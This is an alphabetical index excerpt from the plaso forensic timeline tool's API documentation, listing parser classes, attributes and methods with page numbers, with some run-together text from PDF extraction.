APTHistoryLogParser (class inplaso.parsers.apt_history), 331

arg_url (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 257

args (plaso.filters.expressions.Expression attribute),155

args (plaso.filters.filters.Filter attribute), 160args (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData

attribute), 257ArgumentHelperManager (class in

plaso.cli.helpers.manager), 70ArgumentsHelper (class in

plaso.cli.helpers.interface), 69ARTIFACT_DEFINITION_NAME

(plaso.preprocessors.interface.ArtifactPreprocessorPluginattribute), 437

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxDistributionPluginattribute), 439

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxHostnamePluginattribute), 439

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxIssueFilePluginattribute), 439

Index 505


ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxStandardBaseReleasePluginattribute), 439

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxSystemdOperatingSystemPluginattribute), 439

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxTimeZonePluginattribute), 439

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxUserAccountsPluginattribute), 439

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSHostnamePluginattribute), 440

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSKeyboardLayoutPluginattribute), 440

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSSystemVersionPluginattribute), 440

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSTimeZonePluginattribute), 440

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSUserAccountsPluginattribute), 440

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePluginattribute), 442

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsAvailableTimeZonesPluginattribute), 442

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsCodepagePluginattribute), 442

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsHostnamePluginattribute), 443

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePluginattribute), 443

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePluginattribute), 443

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePluginattribute), 443

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsSystemProductPluginattribute), 443

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePluginattribute), 443

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsSystemVersionPluginattribute), 444

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsTimeZonePluginattribute), 444

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsUserAccountsPluginattribute), 444

ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePluginattribute), 444

artifact_filters (plaso.containers.sessions.Sessionattribute), 110

artifact_filters (plaso.containers.sessions.SessionConfigurationattribute), 113

artifact_filters (plaso.engine.configurations.ProcessingConfigurationattribute), 122

ArtifactAttributeContainer (class inplaso.containers.artifacts), 98

ArtifactDefinitionsArgumentsHelper (classin plaso.cli.helpers.artifact_definitions), 62

ArtifactDefinitionsFiltersHelper (class inplaso.engine.artifact_filters), 120

ArtifactFiltersArgumentsHelper (class inplaso.cli.helpers.artifact_filters), 63

ArtifactPreprocessorPlugin (class inplaso.preprocessors.interface), 437

ASLEventData (class in plaso.parsers.asl), 332ASLFormatter (class in plaso.formatters.asl), 166ASLParser (class in plaso.parsers.asl), 333attachment_location

(plaso.parsers.sqlite_plugins.imessage.IMessageEventDataattribute), 269

attribute (plaso.filters.expressions.Expressionattribute), 155, 156

attribute_data_type(plaso.parsers.mac_keychain.KeychainDatabaseColumnattribute), 360

attribute_identifier(plaso.parsers.mac_keychain.KeychainDatabaseColumnattribute), 360

ATTRIBUTE_NAME (plaso.analyzers.hashers.entropy.EntropyHasherattribute), 54

ATTRIBUTE_NAME (plaso.analyzers.hashers.interface.BaseHasherattribute), 55

ATTRIBUTE_NAME (plaso.analyzers.hashers.md5.MD5Hasherattribute), 57

ATTRIBUTE_NAME (plaso.analyzers.hashers.sha1.SHA1Hasherattribute), 57

ATTRIBUTE_NAME (plaso.analyzers.hashers.sha256.SHA256Hasherattribute), 58

attribute_name (plaso.containers.analyzer_result.AnalyzerResultattribute), 97

506 Index


attribute_name (plaso.parsers.mac_keychain.KeychainDatabaseColumnattribute), 360

attribute_type (plaso.parsers.ntfs.NTFSFileStatEventDataattribute), 377

attribute_value (plaso.containers.analyzer_result.AnalyzerResultattribute), 97

attribute_values_hash(plaso.storage.identifiers.FakeIdentifier at-tribute), 478

AttributeContainer (class inplaso.containers.interface), 106

AttributeContainerIdentifier (class inplaso.containers.interface), 107

AttributeContainerSerializer (class inplaso.serializer.interface), 444

AttributeContainersManager (class inplaso.containers.manager), 107

attributes (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemattribute), 403

audit_type (plaso.parsers.selinux.SELinuxLogEventDataattribute), 397

authentication_method(plaso.parsers.syslog_plugins.ssh.SSHEventDataattribute), 295

author (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 223

author_identifier(plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventDataattribute), 288

AutomaticDestinationsDestListEntryEventData(class in plaso.parsers.olecf_plugins.automatic_destinations),234

AutomaticDestinationsOLECFPlugin (class inplaso.parsers.olecf_plugins.automatic_destinations),234

AutoRunsPlugin (class inplaso.parsers.winreg_plugins.run), 314

available_time_zones(plaso.containers.artifacts.SystemConfigurationArtifactattribute), 100

available_time_zones()(plaso.engine.knowledge_base.KnowledgeBaseproperty), 131

Bbackground_bytes_read

(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

background_bytes_written(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

background_context_switches(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

background_cycle_time(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

background_number_for_flushes(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

background_number_for_read_operations(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

background_number_for_write_operations(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230

BackgroundActivityModeratorEventData(class in plaso.parsers.winreg_plugins.bam),298

BackgroundActivityModeratorWindowsRegistryPlugin(class in plaso.parsers.winreg_plugins.bam),298

backup_id (plaso.parsers.symantec.SymantecEventDataattribute), 407

BadConfigObject, 184BadConfigOption, 184BagMRUEventData (class in

plaso.parsers.winreg_plugins.bagmru), 297BagMRUWindowsRegistryPlugin (class in

plaso.parsers.winreg_plugins.bagmru), 297BaseAnalyzer (class in plaso.analyzers.interface), 59BaseChromeCookiePlugin (class in

plaso.parsers.sqlite_plugins.chrome_cookies),256

BaseCookiePlugin (class inplaso.parsers.cookie_plugins.interface),220

BaseEngine (class in plaso.engine.engine), 124BaseFileEntryFilter (class in

plaso.parsers.interface), 355BaseFirefoxCacheParser (class in

plaso.parsers.firefox_cache), 349BaseGoogleChromeHistoryPlugin (class in

plaso.parsers.sqlite_plugins.chrome_history),258

BaseHasher (class inplaso.analyzers.hashers.interface), 55

BaseMRUListExWindowsRegistryPlugin (classin plaso.parsers.winreg_plugins.mrulistex),307

BaseMRUListWindowsRegistryPlugin (class inplaso.parsers.winreg_plugins.mrulist), 305

BaseParser (class in plaso.parsers.interface), 355BasePlugin (class in plaso.parsers.plugins), 384BasePluginCache (class in plaso.parsers.plugins),

385BaseStorageFile (class in

plaso.storage.file_interface), 469

Index 507


BaseStore (class in plaso.storage.interface), 479BaseTableView (class in plaso.cli.views), 96BaseWindowsRegistryKeyFilter (class in

plaso.parsers.winreg_plugins.interface), 301BashHistoryEventData (class in

plaso.parsers.bash_history), 334BashHistoryParser (class in

plaso.parsers.bash_history), 334BENCODE_KEYS (plaso.parsers.bencode_plugins.interface.BencodePlugin

attribute), 215BENCODE_KEYS (plaso.parsers.bencode_plugins.transmission.TransmissionPlugin

attribute), 216BENCODE_KEYS (plaso.parsers.bencode_plugins.utorrent.UTorrentPlugin

attribute), 217BencodeParser (class in

plaso.parsers.bencode_parser), 335BencodePlugin (class in

plaso.parsers.bencode_plugins.interface),215

BINARY_DATA_COLUMN_TYPES(plaso.parsers.esedb_plugins.interface.ESEDBPluginattribute), 226

binary_path (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventDataattribute), 298

BinaryCookieParser (class inplaso.parsers.safari_cookies), 391

BinaryDSVReader (class inplaso.lib.line_reader_file), 187

BinaryExpression (class inplaso.filters.expressions), 154

BinaryLineReader (class inplaso.lib.line_reader_file), 187

BinaryOperator (class in plaso.filters.filters), 159birth_droid_file_identifier

(plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataattribute), 234

birth_droid_file_identifier(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

birth_droid_volume_identifier(plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataattribute), 234

birth_droid_volume_identifier(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

birthday (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataattribute), 284

BLANK (plaso.parsers.iis.WinIISParser attribute), 354block_mode (plaso.parsers.trendmicroav.TrendMicroUrlEventData

attribute), 419block_number (plaso.parsers.chrome_cache.CacheAddress

attribute), 336block_offset (plaso.parsers.chrome_cache.CacheAddress

attribute), 336

block_size (plaso.parsers.chrome_cache.CacheAddressattribute), 336

BluetoothPlugin (class inplaso.parsers.plist_plugins.bluetooth), 239

body (plaso.parsers.dpkg.DpkgEventData attribute),344

body (plaso.parsers.selinux.SELinuxLogEventData at-tribute), 397

body (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDataattribute), 251

body (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageDataattribute), 268

body (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventDataattribute), 271

body (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataattribute), 276

body (plaso.parsers.syslog.SyslogCommentEventDataattribute), 411

body (plaso.parsers.syslog.SyslogLineEventData at-tribute), 411

body (plaso.parsers.systemd_journal.SystemdJournalEventDataattribute), 413

BootExecutePlugin (class inplaso.parsers.winreg_plugins.lfu), 303

BootVerificationPlugin (class inplaso.parsers.winreg_plugins.lfu), 303

BrowserSearchPlugin (class inplaso.analysis.browser_search), 39

bsd_name (plaso.parsers.santa.SantaMountEventDataattribute), 394

BSMEventData (class in plaso.parsers.bsm), 335BSMParser (class in plaso.parsers.bsm), 335BUFFER_SIZE (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParser

attribute), 352BUFFER_SIZE (plaso.parsers.sccm.SCCMParser at-

tribute), 396BUFFER_SIZE (plaso.parsers.text_parser.PyparsingMultiLineTextParser

attribute), 415build_number (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData

attribute), 324BuildArtifactsRegistry()

(plaso.engine.engine.BaseEngine classmethod), 125

BuildCollectionFilters()(plaso.engine.engine.BaseEngine method),125

BuildFindSpecs() (plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelpermethod), 120

BuildFindSpecs() (plaso.engine.path_filters.PathCollectionFiltersHelpermethod), 132

bundle_id (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventDataattribute), 254

bundle_identifier(plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData

508 Index


attribute), 274bundle_identifier

(plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventDataattribute), 275

bundle_name (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataattribute), 276

bus (plaso.parsers.santa.SantaMountEventData at-tribute), 395

bytes_received (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataattribute), 232

bytes_sent (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataattribute), 232

Ccache_directory_index

(plaso.parsers.msiecf.MSIECFLeakEventDataattribute), 374

cache_directory_index(plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375

cache_directory_name(plaso.parsers.msiecf.MSIECFLeakEventDataattribute), 374

cache_directory_name(plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375

cache_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

CacheAddress (class in plaso.parsers.chrome_cache),336

cached_file_size (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

cached_file_size (plaso.parsers.msiecf.MSIECFLeakEventDataattribute), 374

cached_file_size (plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375

cached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

cached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventDataattribute), 229

cached_filename (plaso.parsers.msiecf.MSIECFLeakEventDataattribute), 374

cached_filename (plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375

CacheEntry (class in plaso.parsers.chrome_cache),336

CacheQueryResults()(plaso.parsers.sqlite.SQLiteCache method),404

call_type (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventDataattribute), 250

CALL_TYPE (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPluginattribute), 251

call_type (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataattribute), 281

caller (plaso.parsers.mac_securityd.MacOSSecuritydLogEventDataattribute), 362

CallFunction() (plaso.multi_processing.plaso_xmlrpc.XMLRPCClientmethod), 192

CallFunction() (plaso.multi_processing.rpc.RPCClientmethod), 195

caption (plaso.parsers.bencode_plugins.utorrent.UTorrentEventDataattribute), 217

case_sensitive (plaso.containers.artifacts.EnvironmentVariableArtifactattribute), 98

cat (plaso.parsers.symantec.SymantecEventDataattribute), 407

CATEGORY (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelperattribute), 65

CATEGORY (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelperattribute), 66

CATEGORY (plaso.cli.helpers.interface.ArgumentsHelperattribute), 69

CATEGORY (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelperattribute), 71

CATEGORY (plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelperattribute), 75

CATEGORY (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelperattribute), 77

CATEGORY (plaso.cli.helpers.timesketch_output.TimesketchOutputArgumentsHelperattribute), 79

CATEGORY (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelperattribute), 80

CATEGORY (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelperattribute), 81

CATEGORY (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelperattribute), 82

CATEGORY (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelperattribute), 83

CCleanerConfigurationEventData (class inplaso.parsers.winreg_plugins.ccleaner), 299

CCleanerPlugin (class inplaso.parsers.winreg_plugins.ccleaner),299

CCleanerUpdateEventData (class inplaso.parsers.winreg_plugins.ccleaner),299

certificate_common_name(plaso.parsers.santa.SantaExecutionEventDataattribute), 392

certificate_hash (plaso.parsers.santa.SantaExecutionEventDataattribute), 392

CheckDependencies() (in moduleplaso.dependencies), 491

CheckFilterExpression()(plaso.parsers.manager.ParsersManagerclass method), 366

Index 509


CheckKeyCompatibility()(plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelperclass method), 121

CheckOutDated() (plaso.cli.tools.CLITool method),94

CheckPath() (plaso.filters.path_filter.PathFilterScanTreemethod), 165

CheckSchema() (plaso.parsers.sqlite_plugins.interface.SQLitePluginmethod), 270

CheckSupportedFormat()(plaso.storage.sqlite.sqlite_file.SQLiteStorageFileclass method), 463

CheckTaskReadyForMerge()(plaso.storage.fake.writer.FakeStorageWritermethod), 448

CheckTaskReadyForMerge()(plaso.storage.interface.StorageWritermethod), 488

CheckTaskReadyForMerge()(plaso.storage.redis.writer.RedisStorageWritermethod), 458

CheckTaskReadyForMerge()(plaso.storage.sqlite.writer.SQLiteStorageFileWritermethod), 465

CheckTaskToMerge()(plaso.multi_processing.task_manager.TaskManagermethod), 196

Chrome17CookiePlugin (class inplaso.parsers.sqlite_plugins.chrome_cookies),256

Chrome66CookiePlugin (class inplaso.parsers.sqlite_plugins.chrome_cookies),256

ChromeAutofillEventData (class inplaso.parsers.sqlite_plugins.chrome_autofill),255

ChromeAutofillPlugin (class inplaso.parsers.sqlite_plugins.chrome_autofill),255

ChromeCacheDataBlockFileParser (class inplaso.parsers.chrome_cache), 337

ChromeCacheEntryEventData (class inplaso.parsers.chrome_cache), 337

ChromeCacheIndexFileParser (class inplaso.parsers.chrome_cache), 338

ChromeCacheParser (class inplaso.parsers.chrome_cache), 338

ChromeContentSettingsExceptionsEventData(class in plaso.parsers.chrome_preferences),339

ChromeContentSettingsExceptionsFormatter(class in plaso.formatters.chrome_preferences),167

ChromeCookieEventData (class in

plaso.parsers.sqlite_plugins.chrome_cookies),256

ChromeExtensionActivityEventData (class inplaso.parsers.sqlite_plugins.chrome_extension_activity),257

ChromeExtensionActivityPlugin (class inplaso.parsers.sqlite_plugins.chrome_extension_activity),258

ChromeExtensionInstallationEventData(class in plaso.parsers.chrome_preferences),339

ChromeExtensionPlugin (class inplaso.analysis.chrome_extension), 40

ChromeExtensionsAutoupdaterEventData(class in plaso.parsers.chrome_preferences),339

ChromeHistoryFileDownloadedEventData(class in plaso.parsers.sqlite_plugins.chrome_history),259

ChromeHistoryPageVisitedEventData (classin plaso.parsers.sqlite_plugins.chrome_history),259

ChromePageVisitedFormatter (class inplaso.formatters.chrome), 167

ChromePreferencesClearHistoryEventData(class in plaso.parsers.chrome_preferences),339

ChromePreferencesParser (class inplaso.parsers.chrome_preferences), 340

CircularBuffer (class in plaso.lib.bufferlib), 183cleaninfo (plaso.parsers.symantec.SymantecEventData

attribute), 407Clear() (plaso.lib.bufferlib.CircularBuffer method),

183ClearEventAttributes()

(plaso.parsers.mediator.ParserMediatormethod), 370

ClearParserChain()(plaso.parsers.mediator.ParserMediatormethod), 370

client (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntryattribute), 279

clientgroup (plaso.parsers.symantec.SymantecEventDataattribute), 407

CLIInputReader (class in plaso.cli.tools), 93CLIOutputWriter (class in plaso.cli.tools), 93CLITableView (class in plaso.cli.views), 96CLITabularTableView (class in plaso.cli.views), 96CLITool (class in plaso.cli.tools), 93Close() (plaso.engine.plaso_queue.Queue method),

134Close() (plaso.engine.zeromq_queue.ZeroMQBufferedQueue

method), 147Close() (plaso.engine.zeromq_queue.ZeroMQQueue

510 Index


method), 150Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseFile

method), 179Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseReader

method), 180Close() (plaso.multi_processing.plaso_xmlrpc.XMLRPCClient

method), 193Close() (plaso.multi_processing.rpc.RPCClient

method), 195Close() (plaso.output.interface.LinearOutputModule

method), 201Close() (plaso.output.interface.OutputModule

method), 201Close() (plaso.output.shared_elastic.SharedElasticsearchOutputModule

method), 211Close() (plaso.output.timesketch_out.TimesketchOutputModule

method), 213Close() (plaso.output.xlsx.XLSXOutputModule

method), 214Close() (plaso.parsers.sqlite.SQLiteDatabase

method), 405Close() (plaso.storage.fake.writer.FakeStorageWriter

method), 448Close() (plaso.storage.file_interface.StorageFileReader

method), 470Close() (plaso.storage.file_interface.StorageFileWriter

method), 474Close() (plaso.storage.interface.BaseStore method),

480Close() (plaso.storage.interface.StorageReader

method), 484Close() (plaso.storage.interface.StorageWriter

method), 488Close() (plaso.storage.redis.reader.RedisStorageReader

method), 452Close() (plaso.storage.redis.redis_store.RedisStore

method), 455Close() (plaso.storage.redis.writer.RedisStorageWriter

method), 458Close() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile

method), 464CLOUD_PATH_CACHE_QUERY

(plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePluginattribute), 266

code_page (plaso.containers.artifacts.SystemConfigurationArtifactattribute), 100

codepage() (plaso.engine.knowledge_base.KnowledgeBaseproperty), 131

codepage() (plaso.parsers.mediator.ParserMediatorproperty), 373

Collect() (plaso.preprocessors.interface.FileSystemArtifactPreprocessorPluginmethod), 438

Collect() (plaso.preprocessors.interface.KnowledgeBasePreprocessorPluginmethod), 438

Collect() (plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPluginmethod), 438

Collect() (plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePluginmethod), 442

Collect() (plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePluginmethod), 442

Collect() (plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePluginmethod), 443

CollectFromFileSystem()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 440

CollectFromKnowledgeBase()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 441

CollectFromWindowsRegistry()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 441

collection_filters_helper(plaso.engine.engine.BaseEngine attribute),124

collection_filters_helper(plaso.parsers.mediator.ParserMediatorattribute), 369

CollectionFiltersHelper (class inplaso.engine.filters_helper), 128

COLUMNS (plaso.parsers.dsv_parser.DSVParser at-tribute), 345

columns (plaso.parsers.mac_keychain.KeychainDatabaseTableattribute), 360

COLUMNS (plaso.parsers.mactime.MactimeParserattribute), 365

COLUMNS (plaso.parsers.mcafeeav.McafeeAccessProtectionParserattribute), 369

COLUMNS (plaso.parsers.networkminer.NetworkMinerParserattribute), 377

COLUMNS (plaso.parsers.symantec.SymantecParser at-tribute), 411

COLUMNS (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParserattribute), 417

COLUMNS (plaso.parsers.trendmicroav.OfficeScanWebReputationParserattribute), 418

COLUMNS (plaso.parsers.trendmicroav.TrendMicroBaseParserattribute), 419

command (plaso.parsers.apt_history.APTHistoryLogEventDataattribute), 331

command (plaso.parsers.bash_history.BashHistoryEventDataattribute), 334

command (plaso.parsers.docker.DockerJSONLayerEventDataattribute), 343

command (plaso.parsers.syslog_plugins.cron.CronTaskRunEventDataattribute), 294

command (plaso.parsers.winreg_plugins.winlogon.WinlogonEventDataattribute), 325

command (plaso.parsers.zsh_extended_history.ZshHistoryEventData

Index 511


attribute), 437command_line_arguments

(plaso.containers.sessions.Session attribute),110

command_line_arguments(plaso.containers.sessions.SessionConfigurationattribute), 113

command_line_arguments(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

COMMENT (plaso.parsers.iis.WinIISParser attribute), 354COMMENT_LINE_HASH

(plaso.parsers.text_parser.PyparsingConstantsattribute), 415

comments (plaso.parsers.mac_keychain.KeychainApplicationRecordEventDataattribute), 359

comments (plaso.parsers.mac_keychain.KeychainInternetRecordEventDataattribute), 360

comments (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventDataattribute), 314

company_name (plaso.parsers.amcache.AMCacheFileEventDataattribute), 326

compare_storage_information(plaso.cli.pinfo_tool.PinfoTool attribute),87

CompareExpression()(plaso.filters.expression_parser.Token method),154

CompareStores() (plaso.cli.pinfo_tool.PinfoToolmethod), 87

Compile() (plaso.filters.expressions.BinaryExpressionmethod), 155

Compile() (plaso.filters.expressions.EventExpressionmethod), 155

Compile() (plaso.filters.expressions.Expressionmethod), 156

Compile() (plaso.filters.expressions.IdentityExpressionmethod), 156

compiled_re (plaso.filters.filters.Regexp attribute),162

CompileFilter() (plaso.filters.event_filter.EventObjectFiltermethod), 152

CompileFilter() (plaso.filters.interface.FilterObjectmethod), 162

CompileReport() (plaso.analysis.browser_search.BrowserSearchPluginmethod), 39

CompileReport() (plaso.analysis.chrome_extension.ChromeExtensionPluginmethod), 40

CompileReport() (plaso.analysis.file_hashes.FileHashesPluginmethod), 41

CompileReport() (plaso.analysis.hash_tagging.HashTaggingAnalysisPluginmethod), 43

CompileReport() (plaso.analysis.interface.AnalysisPluginmethod), 44

CompileReport() (plaso.analysis.sessionize.SessionizeAnalysisPluginmethod), 49

CompileReport() (plaso.analysis.tagging.TaggingAnalysisPluginmethod), 49

CompileReport() (plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPluginmethod), 50

CompileReport() (plaso.analysis.windows_services.WindowsServicesAnalysisPluginmethod), 53

CompleteTask() (plaso.multi_processing.task_manager.TaskManagermethod), 197

completion_time (plaso.containers.sessions.Sessionattribute), 110

completion_time (plaso.containers.tasks.Task at-tribute), 115

component (plaso.parsers.android_app_usage.AndroidAppUsageEventDataattribute), 329

component (plaso.parsers.sccm.SCCMLogEventDataattribute), 396

CompoundZIPParser (class in plaso.parsers.czip),342

CompoundZIPPlugin (class inplaso.parsers.czip_plugins.interface), 222

compressed (plaso.parsers.symantec.SymantecEventDataattribute), 407

CompressedFileHandler (class inplaso.lib.loggers), 188

computer (plaso.parsers.symantec.SymantecEventDataattribute), 407

computer_name (plaso.parsers.asl.ASLEventData at-tribute), 332

computer_name (plaso.parsers.cups_ipp.CupsIppEventDataattribute), 340

computer_name (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventDataattribute), 358

computer_name (plaso.parsers.winevt.WinEvtRecordEventDataattribute), 423

computer_name (plaso.parsers.winevtx.WinEvtxRecordEventDataattribute), 425

ConditionalEventFormatter (class inplaso.formatters.interface), 170

configuration (plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventDataattribute), 299

configuration (plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventDataattribute), 319

ConfigureLogging() (in module plaso.lib.loggers),188

connection_type (plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventDataattribute), 311

ConnectionError, 184container_id (plaso.parsers.docker.DockerJSONContainerEventData

attribute), 342container_id (plaso.parsers.docker.DockerJSONContainerLogEventData

attribute), 343container_identifier

512 Index


(plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

container_identifier(plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventDataattribute), 228

container_name (plaso.parsers.docker.DockerJSONContainerEventDataattribute), 342

CONTAINER_TYPE (plaso.containers.analyzer_result.AnalyzerResultattribute), 98

CONTAINER_TYPE (plaso.containers.artifacts.EnvironmentVariableArtifactattribute), 98

CONTAINER_TYPE (plaso.containers.artifacts.HostnameArtifactattribute), 98

CONTAINER_TYPE (plaso.containers.artifacts.OperatingSystemArtifactattribute), 99

CONTAINER_TYPE (plaso.containers.artifacts.SourceConfigurationArtifactattribute), 100

CONTAINER_TYPE (plaso.containers.artifacts.SystemConfigurationArtifactattribute), 100

CONTAINER_TYPE (plaso.containers.artifacts.TimeZoneArtifactattribute), 101

CONTAINER_TYPE (plaso.containers.artifacts.UserAccountArtifactattribute), 101

CONTAINER_TYPE (plaso.containers.event_sources.EventSourceattribute), 102

CONTAINER_TYPE (plaso.containers.events.EventDataattribute), 103

CONTAINER_TYPE (plaso.containers.events.EventDataStreamattribute), 104

CONTAINER_TYPE (plaso.containers.events.EventObjectattribute), 104

CONTAINER_TYPE (plaso.containers.events.EventTagattribute), 105

CONTAINER_TYPE (plaso.containers.interface.AttributeContainerattribute), 106

CONTAINER_TYPE (plaso.containers.reports.AnalysisReportattribute), 109

CONTAINER_TYPE (plaso.containers.sessions.Sessionattribute), 111

CONTAINER_TYPE (plaso.containers.sessions.SessionCompletionattribute), 112

CONTAINER_TYPE (plaso.containers.sessions.SessionConfigurationattribute), 113

CONTAINER_TYPE (plaso.containers.sessions.SessionStartattribute), 114

CONTAINER_TYPE (plaso.containers.storage_media.MountPointattribute), 115

CONTAINER_TYPE (plaso.containers.tasks.Task at-tribute), 116

CONTAINER_TYPE (plaso.containers.tasks.TaskCompletionattribute), 117

CONTAINER_TYPE (plaso.containers.tasks.TaskStartattribute), 117

CONTAINER_TYPE (plaso.containers.warnings.ExtractionError

attribute), 118CONTAINER_TYPE (plaso.containers.warnings.ExtractionWarning

attribute), 119CONTAINER_TYPE (plaso.engine.configurations.CredentialConfiguration

attribute), 121CONTAINER_TYPE (plaso.engine.configurations.EventExtractionConfiguration

attribute), 121CONTAINER_TYPE (plaso.engine.configurations.ExtractionConfiguration

attribute), 122CONTAINER_TYPE (plaso.engine.configurations.ProcessingConfiguration

attribute), 123CONTAINER_TYPE (plaso.engine.configurations.ProfilingConfiguration

attribute), 123Contains (class in plaso.filters.filters), 159content (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventData

attribute), 264content (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData

attribute), 288content_length (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventData

attribute), 253content_type (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventData

attribute), 403conversation_identifier

(plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventDataattribute), 285

ConvertTokenToInteger() (in moduleplaso.parsers.text_parser), 414

